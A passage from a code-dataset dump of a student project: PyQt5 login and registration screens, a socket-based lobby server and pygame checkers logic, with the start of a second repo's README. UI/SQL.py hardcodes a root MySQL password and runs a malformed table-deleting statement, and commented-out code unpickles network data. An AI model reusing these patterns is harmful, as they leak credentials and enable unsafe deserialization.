self.EmailExistPopUp()\n exist = True\n elif exist_first_name == \"\" or exist_user == \"\" or exist_passw == \"\" or exist_last_name == \"\" or exist_email == \"\":\n exist = True\n if not exist:\n mycursor.execute(\"INSERT INTO Users (username, password, first_name, last_name, birth_year, email) VALUES (%s,%s,%s,%s,%s,%s)\", (username, password, firstName, lastName, birthYear, email))\n db.commit()\n self.openWindow()\n\n def UsernameExistPopUp(self):\n msg = QMessageBox()\n msg.setWindowTitle(\"Username Exists\")\n msg.setText(\"This 
username is already exists.\")\n\n x = msg.exec_()\n\n def EmailExistPopUp(self):\n msg = QMessageBox()\n msg.setWindowTitle(\"Email Exists\")\n msg.setText(\"This email address is already exists.\")\n\n x = msg.exec_()\n\n def InvalidBirthYearPopUp(self):\n msg = QMessageBox()\n msg.setWindowTitle(\"Invalid Birth Year\")\n msg.setText(\"The birth year is not valid.\")\n\n x = msg.exec_()\n\n def retranslateUi(self, Registration):\n _translate = QtCore.QCoreApplication.translate\n Registration.setWindowTitle(_translate(\"Registration\", \"Registration Page\"))\n self.RegisterLabel.setText(_translate(\"Registration\", \"Register\"))\n self.FirstName.setPlaceholderText(_translate(\"Registration\", \"Enter your First Name\"))\n self.BirthYear.setPlaceholderText(_translate(\"Registration\", \"Enter your Birth Year\"))\n self.Username.setPlaceholderText(_translate(\"Registration\", \"Enter Username\"))\n self.LastName.setPlaceholderText(_translate(\"Registration\", \"Enter your Last Name\"))\n self.EmailAdress.setPlaceholderText(_translate(\"Registration\", \"Enter your Email Adress\"))\n self.Password.setPlaceholderText(_translate(\"Registration\", \"Enter Password\"))\n self.Back.setText(_translate(\"Registration\", \"Back\"))\n self.Register.setText(_translate(\"Registration\", \"Register\"))\n\nclass Ui_ChessOptions(object):\n def setupUi(self, ChessOptions):\n ChessOptions.setObjectName(\"ChessOptions\")\n ChessOptions.resize(600, 400)\n ChessOptions.setStyleSheet(\"background-color:black;\")\n self.centralwidget = QtWidgets.QWidget(ChessOptions)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.MainLabel = QtWidgets.QLabel(self.centralwidget)\n self.MainLabel.setGeometry(QtCore.QRect(207, 30, 185, 71))\n self.MainLabel.setStyleSheet(\"color:white;\\n\"\n\"font:bold 25px;\\n\"\n\"\")\n self.MainLabel.setObjectName(\"MainLabel\")\n self.PlayVSComputer = QtWidgets.QLabel(self.centralwidget)\n self.PlayVSComputer.setGeometry(QtCore.QRect(100, 120, 300, 50))\n self.PlayVSComputer.setStyleSheet(\"background-color:grey;\\n\"\n\"color:white;\\n\"\n\"border-style:outset;\\n\"\n\"border-width:2px;\\n\"\n\"border-radius:10px;\\n\"\n\"border-color:white;\\n\"\n\"font:bold 14px;\\n\"\n\"border-color:black;\")\n self.PlayVSComputer.setObjectName(\"PlayVSComputer\")\n self.PlayVSFriend = QtWidgets.QLabel(self.centralwidget)\n self.PlayVSFriend.setGeometry(QtCore.QRect(100, 190, 300, 50))\n self.PlayVSFriend.setStyleSheet(\"background-color:grey;\\n\"\n\"color:white;\\n\"\n\"border-style:outset;\\n\"\n\"border-width:2px;\\n\"\n\"border-radius:10px;\\n\"\n\"border-color:white;\\n\"\n\"font:bold 14px;\\n\"\n\"border-color:black;\")\n self.PlayVSFriend.setObjectName(\"PlayVSFriend\")\n self.PlayVSYourself = QtWidgets.QLabel(self.centralwidget)\n self.PlayVSYourself.setGeometry(QtCore.QRect(100, 260, 300, 50))\n self.PlayVSYourself.setStyleSheet(\"background-color:grey;\\n\"\n\"color:white;\\n\"\n\"border-style:outset;\\n\"\n\"border-width:2px;\\n\"\n\"border-radius:10px;\\n\"\n\"border-color:white;\\n\"\n\"font:bold 14px;\\n\"\n\"border-color:black;\")\n self.PlayVSYourself.setObjectName(\"PlayVSYourself\")\n ChessOptions.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(ChessOptions)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 600, 21))\n self.menubar.setObjectName(\"menubar\")\n ChessOptions.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(ChessOptions)\n self.statusbar.setObjectName(\"statusbar\")\n ChessOptions.setStatusBar(self.statusbar)\n 
self.retranslateUi(ChessOptions)\n QtCore.QMetaObject.connectSlotsByName(ChessOptions)\n \n\n def retranslateUi(self, ChessOptions):\n _translate = QtCore.QCoreApplication.translate\n ChessOptions.setWindowTitle(_translate(\"ChessOptions\", \"Chess Options\"))\n self.MainLabel.setText(_translate(\"ChessOptions\", \"Chess Options\"))\n self.PlayVSComputer.setText(_translate(\"ChessOptions\", \"Play VS. computer\"))\n self.PlayVSFriend.setText(_translate(\"ChessOptions\", \"Play VS. a friend\"))\n self.PlayVSYourself.setText(_translate(\"ChessOptions\", \"Play VS. yourself\"))\n\nif __name__ == \"__main__\":\n import sys\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n ui = Ui_MainWindow()\n ui.setupUi(MainWindow)\n mycursor.execute(\"SELECT * FROM Users\")\n for x in mycursor:\n print(x)\n MainWindow.show()\n sys.exit(app.exec_())\n"
},
{
"alpha_fraction": 0.5681159496307373,
"alphanum_fraction": 0.5920289754867554,
"avg_line_length": 21.62295150756836,
"blob_id": "7c8f85372821b83faea496c15ce176d030d9efb0",
"content_id": "db6cd9543c04fe5832f49a4374b3c1ff1c1a21ac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1380,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 61,
"path": "/server.py",
"repo_name": "AmitWin/Mini-Final-Project",
"src_encoding": "UTF-8",
"text": "import socket\nfrom _thread import *\nfrom lobby import Lobby\nimport pickle\nimport time\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\nserver = \"localhost\"\nport = 5555\n\nserver_ip = socket.gethostbyname(server)\n\nconnections = 0\n\ngames = {}\n\n\ndef main():\n try:\n sock.bind((server, port))\n\n except socket.error as e:\n print(str(e))\n\n sock.listen()\n print(\"[START] Waiting for a connection\")\n\n while True:\n client, addr = sock.accept()\n print(\"[CONNECT] New Connection\")\n\n lobbyId = int(client.recv(1024).decode())\n if lobbyId == -1:\n lobbyId = id_generator()\n games[lobbyId] = Lobby(client, lobbyId)\n client.send(b\"Creating New Lobby \" + str(lobbyId).encode())\n print(\"Created New Lobby\")\n games[lobbyId].start()\n\n elif lobbyId in games.keys():\n if not len(games[lobbyId].clients) == 2:\n games[lobbyId].clients.append(client)\n client.send(b\"Joining Into an Existing Lobby\")\n\n else:\n client.send(b\"[ERROR] 743: lobby is full\")\n\n else:\n client.send(b\"[ERROR] 404: lobby not found\")\n\n\ndef id_generator():\n import random\n lobbyId = random.randint(1000, 9999)\n while lobbyId in games.keys():\n lobbyId = random.randint(1000, 9999)\n\n return lobbyId\n\nmain()\n"
},
{
"alpha_fraction": 0.5283893346786499,
"alphanum_fraction": 0.5451911687850952,
"avg_line_length": 30.981481552124023,
"blob_id": "f5fee2342ccede89eaa4ddc0e908944cfdb32938",
"content_id": "4d31653050319613d5fa08b3826e8f41a4a92798",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1726,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 54,
"path": "/lobby.py",
"repo_name": "AmitWin/Mini-Final-Project",
"src_encoding": "UTF-8",
"text": "import pygame as pg\nimport threading\nimport board\nimport pickle\n\n\nclass Lobby(threading.Thread):\n def __init__(self, client, lobbyId):\n threading.Thread.__init__(self)\n self.lobbyId = lobbyId\n self.clients = [client]\n\n def run(self):\n while len(self.clients) < 2:\n pass\n\n for i in range(len(self.clients)):\n self.clients[i].send(b\"Starting Game...\")\n color = \"w\" if i == 0 else \"b\"\n self.clients[i].send(b\"You are:\" + color.encode())\n\n self.play()\n\n def play(self):\n while True:\n board = self.clients[0].recv(1024 * 32)\n self.clients[1].send(board)\n board = self.clients[1].recv(1024 * 32)\n self.clients[0].send(board)\n\n \"\"\"\n currentId = 0\n sendBoard = pickle.dumps(self.board)\n for client in self.clients:\n client.send(sendBoard)\n\n while not self.board.winner:\n color = \"white\" if currentId == 0 else \"black\"\n for client in self.clients:\n print(\"This is \" + color + \" turn\")\n client.send((\"This is \" + color + \" turn\").encode())\n\n sendBoard = pickle.dumps(self.board)\n self.clients[currentId].send(sendBoard)\n print(\"Sending Board to \" + color + \"in lobby \" + str(self.lobbyId))\n\n newBoard = self.clients[currentId].recv(1024 * 32)\n self.board = pickle.loads(newBoard)\n print(\"Received Board From \" + color + \" in lobby \" + str(self.lobbyId))\n currentId = 1 if currentId == 0 else 0\n\n for client in self.clients:\n client.send((self.board.winner + \" is the Winner\").encode())\n \"\"\""
},
{
"alpha_fraction": 0.6481038331985474,
"alphanum_fraction": 0.682439386844635,
"avg_line_length": 37.768211364746094,
"blob_id": "4d617c50cb98d58fe4890f0620bea6e9042ccdfd",
"content_id": "68f9c568ad970f160742e1d9c6652a1ba09b0d95",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5854,
"license_type": "no_license",
"max_line_length": 163,
"num_lines": 151,
"path": "/UI/Register.py",
"repo_name": "AmitWin/Mini-Final-Project",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\n# Form implementation generated from reading ui file 'Register.ui'\n#\n# Created by: PyQt5 UI code generator 5.13.2\n#\n# WARNING! All changes made in this file will be lost!\n\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\n\nclass Ui_RegisterWindow(object):\n\n def openWindow(self):\n\n self.window = QtWidgets.QMainWindow()\n self.ui = Register.Ui_RegisterWindow()\n self.ui.setupUi(self.window)\n self.window.show()\n\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(600, 400)\n MainWindow.setStyleSheet(\"background-color:black;\")\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.label = QtWidgets.QLabel(self.centralwidget)\n self.label.setGeometry(QtCore.QRect(215, 10, 170, 50))\n self.label.setStyleSheet(\"color:white;\\n\"\n\"font:bold 35px;\\n\"\n\"\")\n self.label.setObjectName(\"label\")\n self.lineEdit = QtWidgets.QLineEdit(self.centralwidget)\n self.lineEdit.setGeometry(QtCore.QRect(70, 80, 200, 40))\n self.lineEdit.setStyleSheet(\"background-color:white;\\n\"\n\"color:grey;\\n\"\n\"border-style:outset;\\n\"\n\"border-width:2px;\\n\"\n\"border-radius:10px;\\n\"\n\"border-color:white;\\n\"\n\"font:bold 14px;\")\n self.lineEdit.setObjectName(\"lineEdit\")\n self.lineEdit_2 = QtWidgets.QLineEdit(self.centralwidget)\n self.lineEdit_2.setGeometry(QtCore.QRect(70, 150, 200, 40))\n self.lineEdit_2.setStyleSheet(\"background-color:white;\\n\"\n\"color:grey;\\n\"\n\"border-style:outset;\\n\"\n\"border-width:2px;\\n\"\n\"border-radius:10px;\\n\"\n\"border-color:white;\\n\"\n\"font:bold 14px;\")\n self.lineEdit_2.setObjectName(\"lineEdit_2\")\n self.lineEdit_3 = QtWidgets.QLineEdit(self.centralwidget)\n self.lineEdit_3.setGeometry(QtCore.QRect(70, 220, 200, 40))\n self.lineEdit_3.setStyleSheet(\"background-color:white;\\n\"\n\"color:grey;\\n\"\n\"border-style:outset;\\n\"\n\"border-width:2px;\\n\"\n\"border-radius:10px;\\n\"\n\"border-color:white;\\n\"\n\"font:bold 14px;\")\n self.lineEdit_3.setObjectName(\"lineEdit_3\")\n self.lineEdit_4 = QtWidgets.QLineEdit(self.centralwidget)\n self.lineEdit_4.setGeometry(QtCore.QRect(340, 80, 200, 40))\n self.lineEdit_4.setStyleSheet(\"background-color:white;\\n\"\n\"color:grey;\\n\"\n\"border-style:outset;\\n\"\n\"border-width:2px;\\n\"\n\"border-radius:10px;\\n\"\n\"border-color:white;\\n\"\n\"font:bold 14px;\")\n self.lineEdit_4.setObjectName(\"lineEdit_4\")\n self.lineEdit_5 = QtWidgets.QLineEdit(self.centralwidget)\n self.lineEdit_5.setGeometry(QtCore.QRect(340, 150, 200, 40))\n self.lineEdit_5.setStyleSheet(\"background-color:white;\\n\"\n\"color:grey;\\n\"\n\"border-style:outset;\\n\"\n\"border-width:2px;\\n\"\n\"border-radius:10px;\\n\"\n\"border-color:white;\\n\"\n\"font:bold 14px;\")\n self.lineEdit_5.setObjectName(\"lineEdit_5\")\n self.lineEdit_6 = QtWidgets.QLineEdit(self.centralwidget)\n self.lineEdit_6.setGeometry(QtCore.QRect(340, 220, 200, 40))\n self.lineEdit_6.setStyleSheet(\"background-color:white;\\n\"\n\"color:grey;\\n\"\n\"border-style:outset;\\n\"\n\"border-width:2px;\\n\"\n\"border-radius:10px;\\n\"\n\"border-color:white;\\n\"\n\"font:bold 14px;\")\n self.lineEdit_6.setObjectName(\"lineEdit_6\")\n self.label_2 = QtWidgets.QLabel(self.centralwidget)\n self.label_2.setGeometry(QtCore.QRect(200, 280, 200, 35))\n 
self.label_2.setStyleSheet(\"background-color:red;\\n\"\n\"color:white;\\n\"\n\"border-style:outset;\\n\"\n\"border-width:2px;\\n\"\n\"border-radius:10px;\\n\"\n\"border-color:white;\\n\"\n\"font:bold 14px;\\n\"\n\"border-color:black;\\n\"\n\"\")\n self.label_2.setObjectName(\"label_2\")\n self.label_3 = QtWidgets.QLabel(self.centralwidget)\n self.label_3.setGeometry(QtCore.QRect(200, 330, 200, 35))\n self.label_3.setStyleSheet(\"background-color:red;\\n\"\n\"color:white;\\n\"\n\"border-style:outset;\\n\"\n\"border-width:2px;\\n\"\n\"border-radius:10px;\\n\"\n\"border-color:white;\\n\"\n\"font:bold 14px;\\n\"\n\"border-color:black;\\n\"\n\"\")\n self.label_3.setObjectName(\"label_3\")\n MainWindow.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(MainWindow)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 600, 21))\n self.menubar.setObjectName(\"menubar\")\n MainWindow.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n\n self.retranslateUi(MainWindow)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"MainWindow\"))\n self.label.setText(_translate(\"MainWindow\", \"Register\"))\n self.lineEdit.setText(_translate(\"MainWindow\", \"Enter your First Name\"))\n self.lineEdit_2.setText(_translate(\"MainWindow\", \"Enter your Birth Year\"))\n self.lineEdit_3.setText(_translate(\"MainWindow\", \"Enter Username\"))\n self.lineEdit_4.setText(_translate(\"MainWindow\", \"Enter your Last Name\"))\n self.lineEdit_5.setText(_translate(\"MainWindow\", \"Enter your Email Adress\"))\n self.lineEdit_6.setText(_translate(\"MainWindow\", \"Enter Password\"))\n self.label_2.setText(_translate(\"MainWindow\", \"<html><head/><body><p align=\\\"center\\\"><span style=\\\" font-size:11pt;\\\">Register</span></p></body></html>\"))\n self.label_3.setText(_translate(\"MainWindow\", \"<html><head/><body><p align=\\\"center\\\"><span style=\\\" font-size:11pt;\\\">Back</span></p></body></html>\"))\n\n\nif __name__ == \"__main__\":\n import sys\n app = QtWidgets.QApplication(sys.argv)\n MainWindow = QtWidgets.QMainWindow()\n ui = Ui_RegisterWindow()\n ui.setupUi(MainWindow)\n MainWindow.show()\n sys.exit(app.exec_())\n"
},
{
"alpha_fraction": 0.5664243102073669,
"alphanum_fraction": 0.5763384103775024,
"avg_line_length": 31.191490173339844,
"blob_id": "fd8835ae17fae5e02f4c2a1913e856f0a66e4341",
"content_id": "609f3962f61caee6fa9c77f6d7d254de4271f09d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1513,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 47,
"path": "/piece.py",
"repo_name": "AmitWin/Mini-Final-Project",
"src_encoding": "UTF-8",
"text": "import pygame as pg\nfrom info import black, white, radius, sqr_width, sqr_height, adjust_location, clicked, rows\n\n\nclass Piece():\n def __init__(self, location, isBlack):\n self.black = isBlack\n self.white = not isBlack\n self.queen = False\n self.possibleLocations = []\n self.row = location[0]\n self.col = location[1]\n self.position = adjust_location(location)\n\n def draw(self, win):\n if self.black:\n if not self.queen:\n pg.draw.circle(win, black, self.position, radius)\n else:\n pg.draw.circle(win, black, self.position, radius, 10)\n\n elif self.white:\n if not self.queen:\n pg.draw.circle(win, white, self.position, radius)\n else:\n pg.draw.circle(win, white, self.position, radius, 10)\n\n def change_pos(self, location):\n self.row = location[0]\n self.col = location[1]\n self.position = adjust_location(location)\n\n def __str__(self):\n return str(self.col) + \" \" + str(self.row)\n\n def highlight_possible_location(self, win):\n for possibleLocation in self.possibleLocations:\n pos = adjust_location(possibleLocation)\n pg.draw.circle(win, (2, 28, 30), pos, radius)\n pg.display.update()\n\n def checks_if_become_queen(self):\n if self.white and self.row == 0:\n self.queen = True\n\n elif self.black and self.row == rows - 1:\n self.queen = True\n"
},
{
"alpha_fraction": 0.6834468245506287,
"alphanum_fraction": 0.7071365118026733,
"avg_line_length": 37.81609344482422,
"blob_id": "92cd54908b918451fede61995e3b8579b29a980b",
"content_id": "f929dc447a526bc4a008a0914e715b53dc17bb4f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3377,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 87,
"path": "/UI/ChessOptions.py",
"repo_name": "AmitWin/Mini-Final-Project",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\n# Form implementation generated from reading ui file 'ChessOptions.ui'\n#\n# Created by: PyQt5 UI code generator 5.13.2\n#\n# WARNING! All changes made in this file will be lost!\n\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\n\nclass Ui_ChessOptions(object):\n def setupUi(self, ChessOptions):\n ChessOptions.setObjectName(\"ChessOptions\")\n ChessOptions.resize(600, 400)\n ChessOptions.setStyleSheet(\"background-color:black;\")\n self.centralwidget = QtWidgets.QWidget(ChessOptions)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.MainLabel = QtWidgets.QLabel(self.centralwidget)\n self.MainLabel.setGeometry(QtCore.QRect(207, 30, 185, 71))\n self.MainLabel.setStyleSheet(\"color:white;\\n\"\n\"font:bold 25px;\\n\"\n\"\")\n self.MainLabel.setObjectName(\"MainLabel\")\n self.PlayVSComputer = QtWidgets.QLabel(self.centralwidget)\n self.PlayVSComputer.setGeometry(QtCore.QRect(100, 120, 300, 50))\n self.PlayVSComputer.setStyleSheet(\"background-color:grey;\\n\"\n\"color:white;\\n\"\n\"border-style:outset;\\n\"\n\"border-width:2px;\\n\"\n\"border-radius:10px;\\n\"\n\"border-color:white;\\n\"\n\"font:bold 14px;\\n\"\n\"border-color:black;\")\n self.PlayVSComputer.setObjectName(\"PlayVSComputer\")\n self.PlayVSFriend = QtWidgets.QLabel(self.centralwidget)\n self.PlayVSFriend.setGeometry(QtCore.QRect(100, 190, 300, 50))\n self.PlayVSFriend.setStyleSheet(\"background-color:grey;\\n\"\n\"color:white;\\n\"\n\"border-style:outset;\\n\"\n\"border-width:2px;\\n\"\n\"border-radius:10px;\\n\"\n\"border-color:white;\\n\"\n\"font:bold 14px;\\n\"\n\"border-color:black;\")\n self.PlayVSFriend.setObjectName(\"PlayVSFriend\")\n self.PlayVSYourself = QtWidgets.QLabel(self.centralwidget)\n self.PlayVSYourself.setGeometry(QtCore.QRect(100, 260, 300, 50))\n self.PlayVSYourself.setStyleSheet(\"background-color:grey;\\n\"\n\"color:white;\\n\"\n\"border-style:outset;\\n\"\n\"border-width:2px;\\n\"\n\"border-radius:10px;\\n\"\n\"border-color:white;\\n\"\n\"font:bold 14px;\\n\"\n\"border-color:black;\")\n self.PlayVSYourself.setObjectName(\"PlayVSYourself\")\n ChessOptions.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(ChessOptions)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 600, 21))\n self.menubar.setObjectName(\"menubar\")\n ChessOptions.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(ChessOptions)\n self.statusbar.setObjectName(\"statusbar\")\n ChessOptions.setStatusBar(self.statusbar)\n\n self.retranslateUi(ChessOptions)\n QtCore.QMetaObject.connectSlotsByName(ChessOptions)\n\n def retranslateUi(self, ChessOptions):\n _translate = QtCore.QCoreApplication.translate\n ChessOptions.setWindowTitle(_translate(\"ChessOptions\", \"Chess Options\"))\n self.MainLabel.setText(_translate(\"ChessOptions\", \"Chess Options\"))\n self.PlayVSComputer.setText(_translate(\"ChessOptions\", \"Play VS. computer\"))\n self.PlayVSFriend.setText(_translate(\"ChessOptions\", \"Play VS. a friend\"))\n self.PlayVSYourself.setText(_translate(\"ChessOptions\", \"Play VS. yourself\"))\n\n\nif __name__ == \"__main__\":\n import sys\n app = QtWidgets.QApplication(sys.argv)\n ChessOptions = QtWidgets.QMainWindow()\n ui = Ui_MainWindow()\n ui.setupUi(ChessOptions)\n ChessOptions.show()\n sys.exit(app.exec_())\n"
},
{
"alpha_fraction": 0.5373051166534424,
"alphanum_fraction": 0.5417594909667969,
"avg_line_length": 27.967741012573242,
"blob_id": "6c18840586c7a2fd80e4fc50a2e2ad89a96ddc7d",
"content_id": "1e306f163a9a0df9d3c1d9e781d73f59793372a7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1796,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 62,
"path": "/checkers.py",
"repo_name": "AmitWin/Mini-Final-Project",
"src_encoding": "UTF-8",
"text": "import pygame as pg\nfrom board import Board\nfrom info import boardWidth, boardHeight, clicked\n\nboard = Board()\n\n\ndef ValidClicked(mousePos, currentPlayer):\n for rowPieces in board.board:\n for piece in rowPieces:\n if piece != 0:\n if currentPlayer == 1 and piece.white:\n if clicked(piece.position, mousePos):\n return piece\n elif currentPlayer == -1 and piece.black:\n if clicked(piece.position, mousePos):\n return piece\n return False\n\n\ndef RedrawGameWindow(board, win):\n board.draw(win)\n for rowPieces in board.board:\n for piece in rowPieces:\n if piece != 0:\n piece.draw(win)\n pg.display.update()\n\n# Main Loop\ndef main():\n # Initiate Windows\n win = pg.display.set_mode((boardWidth, boardHeight))\n pg.display.set_caption(\"Checkers\")\n\n run = True\n clock = pg.time.Clock()\n currentPlayer = 1\n RedrawGameWindow(board, win)\n\n while run:\n clock.tick(27)\n\n keys = pg.key.get_pressed()\n for event in pg.event.get():\n if event.type == pg.QUIT or keys[pg.K_ESCAPE]:\n run = False\n\n if event.type == pg.MOUSEBUTTONDOWN:\n mousePos = pg.mouse.get_pos()\n clickedPiece = ValidClicked(mousePos, currentPlayer)\n while clickedPiece:\n board.update_moves(clickedPiece)\n clickedPiece = board.move(clickedPiece, win)\n if clickedPiece == \"moved\":\n currentPlayer *= -1\n clickedPiece = None\n\n RedrawGameWindow(board, win)\n\nif __name__ == '__main__':\n if __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.7066666483879089,
"alphanum_fraction": 0.7180952429771423,
"avg_line_length": 33.93333435058594,
"blob_id": "0b988cf44ca54cae7765c0e5a86615afae28ff48",
"content_id": "880abe89e5db0d9599b98dc500a69752dcbfd7b3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 525,
"license_type": "no_license",
"max_line_length": 174,
"num_lines": 15,
"path": "/UI/SQL.py",
"repo_name": "AmitWin/Mini-Final-Project",
"src_encoding": "UTF-8",
"text": "import mysql.connector\nfrom datetime import datetime\n\ndb = mysql.connector.connect(\n host='localhost',\n user='root',\n passwd='wamit112233',\n database='testdatabase'\n )\n\nmycursor = db.cursor()\n\n#mycursor.execute('CREATE TABLE Test (name VARCHAR(50) NOT NULL, created datetime NOT NULL, gender ENUM(\"M\", \"F\", \"O\") NOT NULL, id int PRIMARY KEY NOT NULL AUTO_INCREMENT)')\n#mycursor.execute(\"CREATE TABLE Users (username VARCHAR(50) NOT NULL, password VARCHAR(50) NOT NULL)\")\nmycursor.execute(\"DELETE TABLE Users\")\n\n"
},
{
"alpha_fraction": 0.586413562297821,
"alphanum_fraction": 0.6503496766090393,
"avg_line_length": 24.024999618530273,
"blob_id": "9f0a77db4ac88ce1fb83baeea191fa08064d8a1b",
"content_id": "68d52356038d3d440e1cdded283aecff87c64b5c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1001,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 40,
"path": "/info.py",
"repo_name": "AmitWin/Mini-Final-Project",
"src_encoding": "UTF-8",
"text": "import pygame as pg\n\n# Board Information\nboardWidth = 600\nboardHeight = 600\nrows = 8\ncols = 8\nsqr_width = boardWidth / rows\nsqr_height = boardHeight / cols\n\n# Colors\nblack = [144, 175, 197]\nwhite = [118, 54, 38]\nyellow = [51, 107, 135]\nblue = [42, 49, 50]\n\n# Piece Information\nradius = int(3 * sqr_width / 8)\n\n\n# Adjust board location to mouse position and the opposite\ndef adjust_location(location):\n position = [0.5 * sqr_height + location[1] * sqr_height, sqr_width * 0.5 + location[0] * sqr_width]\n position[0] = int(position[0])\n position[1] = int(position[1])\n return position\n\ndef adjust_position(position):\n location = [position[1] // sqr_height, position[0] // sqr_width]\n location[0] = int(location[0])\n location[1] = int(location[1])\n return location\n\n\n# Checks if a circle was clicked\ndef clicked(position, mousePos):\n dist = ((mousePos[0] - position[0]) ** 2 + (mousePos[1] - position[1]) ** 2) ** 0.5\n if dist < radius:\n return True\n return False\n"
}
] | 12 |
arccoza/fsnd_p0_movie_trailer_website | https://github.com/arccoza/fsnd_p0_movie_trailer_website | 1b13457d3178680870527fd8251919bbff133ad4 | b72531764ad75c657940518dc17daddab84cdde9 | 65e4ce50020eeb47076fb6e9707afea374ff5812 | refs/heads/master | 2020-07-05T17:07:17.430453 | 2016-11-23T03:49:46 | 2016-11-23T03:49:46 | 73,989,099 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7419936656951904,
"alphanum_fraction": 0.756878674030304,
"avg_line_length": 45.1875,
"blob_id": "a91594754ff91170f883ca5e13f14c8493a0c0c7",
"content_id": "addad78343dca2eafaf0c76e3baed316f8aba568",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2217,
"license_type": "no_license",
"max_line_length": 179,
"num_lines": 48,
"path": "/README.md",
"repo_name": "arccoza/fsnd_p0_movie_trailer_website",
"src_encoding": "UTF-8",
"text": "# fsnd_p0_movie_trailer_website\nProject #0 of the Udacity FSND.\n\nThis project was developed for and requires python 2.7.\n\nAll development and testing was done on Linux (elementary OS 0.4 / Ubuntu 16.04), running the project under Windows was not tested, but effort was made to make sure it should run.\n\nA modern browser (IE 11 / Edge, current versions of Chrome / Firefox / Safari) is required to view the site.\n\nAn internet connection is required to access online resources.\n\n## Download and Setup\n\n### Download\nTo download this project either:\n- Clone this repo with `git clone https://github.com/arccoza/fsnd_p0_movie_trailer_website.git`\n- Or download it as an archive from [here](https://github.com/arccoza/fsnd_p0_movie_trailer_website/archive/master.zip) and unzip.\n\n### Setup\nOnce you have the project in the `fsnd_p0_movie_trailer_website` directory (or wherever you put it) setup a Python environment (optional), then install the dependencies, like so:\n\n#### Python environment (optional)\n1. From the command line in the fsnd_p0_movie_trailer_website directory, type: `virtualenv -p python2 .env`\n2. Activate the environment in this console with `source .env/bin/activate`\n\nIf you do not have **virtualenv** installed [click here](https://virtualenv.pypa.io/en/stable/installation/) for help.\n\n#### Install required packages\n- From the command line in the fsnd_p0_movie_trailer_website directory, type: `pip install -r requirements.txt`\n\nIf you do not have **pip** installed [click here](https://pip.pypa.io/en/stable/installing/) for help.\n\n## Building and Running\n\nTo access the Movie Trailers site:\n\n0. Make sure your python environment is active (optional).\n1. Build the site by running `python build.py` (this may take a moment) from the command line in the fsnd_p0_movie_trailer_website directory.\n2. Access the site by running the http server `python server.py`\n3. Open your browser to [http://localhost:8000](http://localhost:8000)\n\nIf everything worked you should see something like:\n\n<img src=\"screenshot.png\">\n\n## Usage\n\nHover over movie posters to see the **play** and **info** buttons. Click on the **play** button to view a trailer. Click on the small **info** button to read a plot overview.\n"
},
{
"alpha_fraction": 0.5893011093139648,
"alphanum_fraction": 0.6169111132621765,
"avg_line_length": 21.288461685180664,
"blob_id": "7644c754513682b9a565474b7a4e46446eb469d6",
"content_id": "a9792c17629a74c1c32d8685005c8b8b1cbe3acb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1159,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 52,
"path": "/server.py",
"repo_name": "arccoza/fsnd_p0_movie_trailer_website",
"src_encoding": "UTF-8",
